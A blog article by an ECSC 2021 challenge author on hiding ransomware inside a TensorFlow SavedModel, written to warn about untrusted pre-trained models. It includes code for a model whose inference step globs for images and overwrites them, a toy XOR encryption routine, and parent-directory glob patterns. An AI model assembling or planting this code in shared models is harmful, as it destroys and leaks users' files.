Pre-trained models play an important role in the progress of machine learning. Object detection models depend on pre-trained image networks, and fine-tuning a pre-trained model is often preferred over training from scratch. So what if somebody could hide ransomware, or spyware stealing your precious data, inside one of these models? What if you could write ransomware directly in TensorFlow? This article goes over the details of what's possible.
DISCLAIMER: This post is intended as an educational overview of the possible dangers of using pre-trained models, not as a guide for creating one.
This year I helped prepare challenges for the European Cyber Security Challenge 2021. The challenge I created is about reversing ransomware that is written in TensorFlow, stored as a TensorFlow model, and encrypts data (in my program, only images) when used for inference. This article won't explain how to solve the challenge, but rather give some details on how it was created. Throughout the rest of the article, I assume TensorFlow 2.4.1.
TensorFlow Model Formats
If we use the popular tf.keras.Model class for building a model, it provides a simple save(...) function. This function allows saving the model in two formats: HDF5 and TensorFlow SavedModel. The benefit of HDF5 is that it saves the model into a single file, but it seems to be more strict about file content. In this post, we will use TensorFlow SavedModel as it allows saving more complex functions.
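As a quick illustration, here is a minimal sketch (with a toy model and made-up file names) of saving in both formats:

```python
import tensorflow as tf

# A trivial model, just to demonstrate the two save formats.
model = tf.keras.Sequential([tf.keras.layers.Dense(1, input_shape=(4,))])

# HDF5: everything is stored in a single .h5 file.
model.save("model.h5")

# SavedModel: a directory containing saved_model.pb, variables/ and assets/.
model.save("saved_model_dir")
```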
Reading & Writing Files
Reading and writing files are the key I/O operations for creating ransomware, and being able to store these functions inside the saved model is the most important step.
It's not a big surprise that there are functions for reading files. After all, the data pipeline is an important part of every machine learning project, so TensorFlow provides a lot of functions for optimizing this process. The two main packages we will use are tf.io and tf.data.

tf.io provides low-level input and output operations. We will use the functions tf.io.read_file(...) and tf.io.write_file(...). The great thing about these functions is that they can read a file directly into a tf.Tensor or write a tf.Tensor out into a file. Moreover, these functions can be saved in the SavedModel format.
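Here is a minimal sketch of how these operations survive saving and reloading (the module and file names are just examples):

```python
import tensorflow as tf

class CopyModule(tf.Module):
    # The input signature lets the function accept arbitrary paths after loading.
    @tf.function(input_signature=[tf.TensorSpec([], tf.string),
                                  tf.TensorSpec([], tf.string)])
    def copy(self, src, dst):
        data = tf.io.read_file(src)   # whole file as a scalar string tensor
        tf.io.write_file(dst, data)   # write the raw bytes back out
        return data

tf.saved_model.save(CopyModule(), "io_demo")

# The reloaded graph still performs real file I/O.
reloaded = tf.saved_model.load("io_demo")
reloaded.copy(tf.constant("input.txt"), tf.constant("copy.txt"))
```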
However, the tricky part turns out to be listing files. Ransomware can't depend on static file paths, and it must be able to list files outside of the model directory. I had to try multiple different functions because some of them always return the same result once saved. Eventually, I arrived at tf.data.Dataset.list_files(...), which lists files based on a glob pattern. Furthermore, this pattern can be in the form of a tf.Tensor.
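For example, a sketch like the following (the pattern is only illustrative) resolves the glob every time the function runs, even after it has been saved and reloaded:

```python
import tensorflow as tf

@tf.function(input_signature=[tf.TensorSpec([], tf.string)])
def show_matches(pattern):
    # Because the pattern is a tf.Tensor, the glob is evaluated at call time
    # rather than being frozen into the graph when the function is traced.
    for path in tf.data.Dataset.list_files(pattern, shuffle=False):
        tf.print(path)

show_matches(tf.constant("*.png"))  # prints PNG files in the current directory
```

Note that list_files raises an error at runtime if nothing matches the pattern.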
Ransomware
With these key components, we can get to writing the actual code. As shown below, we create the model by subclassing tf.keras.Model. Then we only need to override the call(...) function, which is executed during prediction. There we perform the actual prediction plus the encryption of the files.
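Here is a minimal sketch of what such a model could look like. The class name, layer, hard-coded pattern, and the pass-through encrypt_bytes(...) placeholder are all illustrative; this is not the code from the ECSC challenge.

```python
import tensorflow as tf

class MaliciousModel(tf.keras.Model):
    def __init__(self):
        super().__init__()
        self.dense = tf.keras.layers.Dense(10, activation="softmax")

    def encrypt_bytes(self, data):
        # Placeholder for the real encryption; bytes pass through unchanged
        # so this sketch stays harmless.
        return data

    def call(self, inputs):
        # Hidden payload: glob for images relative to the working directory
        # and overwrite them with their "encrypted" contents.
        for path in tf.data.Dataset.list_files(tf.constant("*.png"),
                                                shuffle=False):
            data = tf.io.read_file(path)
            tf.io.write_file(path, self.encrypt_bytes(data))
        # The legitimate-looking prediction the victim actually asked for.
        return self.dense(inputs)
```

Calling predict(...) on such a model, or serving it behind an API, would then trigger the file manipulation as a side effect of an ordinary-looking inference.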
I skipped the actual encryption function. There are some limitations when using TensorFlow for arbitrary-length arrays, but with enough creativity, this shouldn't be a problem, especially since the files can be loaded as byte arrays.
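As a toy illustration of working on the raw bytes (a repeating-key XOR, which is not the algorithm used in the challenge), something along these lines is possible:

```python
import tensorflow as tf

# Lookup table mapping each byte value back to a one-byte string so the
# encrypted tensor can be joined back into file contents.
BYTE_TABLE = tf.constant([bytes([i]) for i in range(256)])

def xor_encrypt(contents, key):
    # contents: scalar string tensor (raw file bytes); key: 1-D uint8 tensor.
    data = tf.io.decode_raw(contents, tf.uint8)              # bytes -> uint8 vector
    n = tf.shape(data)[0]
    stream = tf.tile(key, [n // tf.shape(key)[0] + 1])[:n]   # repeat key to length
    encrypted = tf.bitwise.bitwise_xor(data, stream)
    # Map each byte back to a one-character string and join everything.
    return tf.strings.reduce_join(
        tf.gather(BYTE_TABLE, tf.cast(encrypted, tf.int32)))
```

Because this operates on whole tensors at once, it also avoids looping over individual bytes.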
The biggest issue is traversing directories. As of right now, the code encrypts only images. This could obviously be extended by checking for different file types and by adding ../ to the pattern to reach parent directories. However, I didn't find any easy way of detecting whether a listed path is a directory or an actual file.
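Since list_files(...) also accepts a vector of patterns, one conceivable extension (the patterns below are only an example) is to probe several parent levels and file types at once:

```python
import tensorflow as tf

# A vector of glob patterns covering several directory levels and file types.
patterns = tf.constant([
    "*.png",
    "../*.png",
    "../../*.jpg",
])
for path in tf.data.Dataset.list_files(patterns, shuffle=False):
    tf.print(path)
```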
Another issue is that the code is quite slow; at least the encryption algorithm I used for the ECSC 2021 challenge was. I suspect this is mainly because I ran the encryption byte by byte, which takes forever on large files. That said, I wouldn't be surprised if somebody managed to perform the encryption using optimized matrix operations.
Conclusion
To create successful ransomware, you would need to figure out more problems than just reading files. On the other hand, it's still concerning that a model can read files without any notice, especially since pre-trained models are a crucial part of the machine learning world.
Right now I am working on feltoken.ai, an application focused on creating a federated learning solution using smart contracts. Preserving data privacy is a crucial part of federated learning, where parties share only the final trained model with each other. The behavior demonstrated in this article makes it impossible to use this model format for sharing models, as it may lead to data leaks.